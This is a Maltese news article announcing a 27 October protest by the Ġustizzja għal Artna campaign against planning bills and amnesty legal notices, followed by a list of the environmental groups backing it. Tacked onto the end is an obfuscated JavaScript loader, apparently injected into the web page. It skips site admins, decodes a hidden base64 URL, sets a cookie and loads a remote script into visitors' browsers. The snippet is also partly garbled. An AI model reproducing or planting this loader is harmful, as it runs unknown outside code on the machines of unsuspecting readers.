Ambjent Lokali

‘Flimkien, inwaqqfuhom!’ – Imħabbra t-tieni protesta minn Ġustizzja għal Artna għas-27 ta’ Ottubru

Hekk kif il-Gvern qed ikompli jippersisti biex jibqa’ għaddej bil-liġijiet tal-ippjanar qerrieda li se jixħtu s-setgħa kollha f’idejn l-iżviluppaturi, il-kampanja Ġustizzja għal Artna qed issejjaħ lin-nies biex jerġgħu jingħaqdu fi protesta t-Tnejn, is-27 ta’ Ottubru. Il-protesta se tibda fil-5:30pm minn quddiem il-Qorti u tibqa’ miexja lejn il-Parlament.

Huma sostnew li la hija għażla tagħhom, u lanqas huwa xi gost u pjaċir tagħhom li jerġgħu joħorġu fit-toroq, iżda qalu li m’għandhom ebda għażla ħlief li jibqgħu jissieltu biex jwaqqfu din it-theddida kbira għall-kwalità ta’ ħajjitna u d-demokrazija. Huma ripetutament stqarrew li jippreferu jpoġġu madwar mejda u jiddiskutu r-riformi urġenti li pajjiżna għandu bżonn fil-qasam tal-ambjent u l-ippjanar. Madankollu, minkejja l-għajta tal-poplu għal ġustizzja — inklużi dawk l-eluf li s-Sibt, 4 ta’ Ottubru ħarġu jipprotestaw fit-toroq tal-Belt — il-Prim Ministru Robert Abela qed jibqa’ jirrifjuta li jisma’ lill-poplu.

L-hekk imsejħa “riforma” tal-ippjanar hija mannara mdendla fuq għonq in-nies. Il-fatt li l-protesta li jmiss se taħbat mal-jum li fih jiġi ppreżentat il-Baġit mhuwiex kumbinazzjoni. Il-messaġġ tagħhom huwa ċar: dan mhuwiex ‘business as usual’.

Iż-żewġ abbozzi tal-ippjanar u t-tliet avviżi legali jippreżentaw theddida imminenti għall-postijiet li huma l-aktar għal qalbna, għall-komunitajiet tagħna, għall-ġustizzja soċjali, u għad-demokrazija. Dawn se jżarmaw is-salvagwardji eżistenti kollha kontra l-iżvilupp bla rażan billi jneħħu s-saħħa effettiva tar-regolamenti tal-ippjanar u jagħtu kontroll assolut lill-Awtorità korrotta tal-Ippjanar. Id-dritt tal-pubbliku li jappella deċiżjonijiet illegali b’mod effettiv se jiġi severament limitat, u l-Qorti se titlef is-setgħa tagħha li tirrevoka permessi illegali. Barra minn hekk, l-avviżi legali se jagħtu amnestija totali għal kull xorta ta’ illegalità li saret sas-sena l-oħra, b’ebda limitu fuq it-tip, id-daqs jew il-post li fih saret.

Huma qalu li huma jemmnu bis-sħiħ li n-nies għandhom is-saħħa li jwaqqfu dan l-attakk fuq il-kwalità tal-ħajja tagħhom. Filwaqt li qed jerġgħu jtennu t-talba tagħhom lill-Prim Ministru Robert Abela biex jirtira immedjatament dawn il-liġijiet, huma qed jerġgħu jsejħu lill-pubbliku biex insaħħu din il-ġlieda kontra l-bullies ta’ dan il-pajjiż — dawk li jemmnu li l-flus jagħtuhom id-dritt li jirfsu fuq iċ-ċittadini komuni.

It-Tnejn 27 ta’ Ottubru, huma mistennija jerġgħu juruhom li huma mhux se jaċċettaw li jgħixu taħt il-ħakma tal-iżviluppaturi.

Għaqdiet:

  • BirdLife Malta
  • Din l-Art Ħelwa
  • Flimkien għal Ambjent Aħjar
  • Friends of the Earth Malta
  • Front Żgħażagħ għall-Ambjent
  • Għawdix
  • Moviment Graffitti
  • Nature Trust – FEE Malta
  • Ramblers Association
  • Wirt Għawdex
(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();